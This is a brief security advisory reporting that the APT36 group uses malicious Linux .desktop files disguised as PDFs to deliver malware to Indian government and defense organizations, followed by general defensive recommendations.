What’s new: The Pakistani APT36 group is exploiting Linux .desktop files to deploy malware targeting government and defense entities in India. The attacks involve phishing emails containing malicious .desktop files disguised as PDFs, which execute hidden commands to download and run malware. This campaign has been ongoing since August 1, 2025, and demonstrates an evolution in APT36’s tactics, making them more sophisticated and evasive.
Who’s affected
Government and defense organizations in India are the primary targets of these attacks, which aim for data exfiltration and persistent access for espionage purposes.
What to do
- Educate users about the risks of opening unexpected email attachments, especially those disguised as PDFs.
- Implement security measures to monitor and restrict the execution of .desktop files.
- Regularly update and patch systems to mitigate vulnerabilities that could be exploited by such malware.
- Consider using endpoint protection solutions that specifically monitor for unusual behaviors associated with .desktop files.
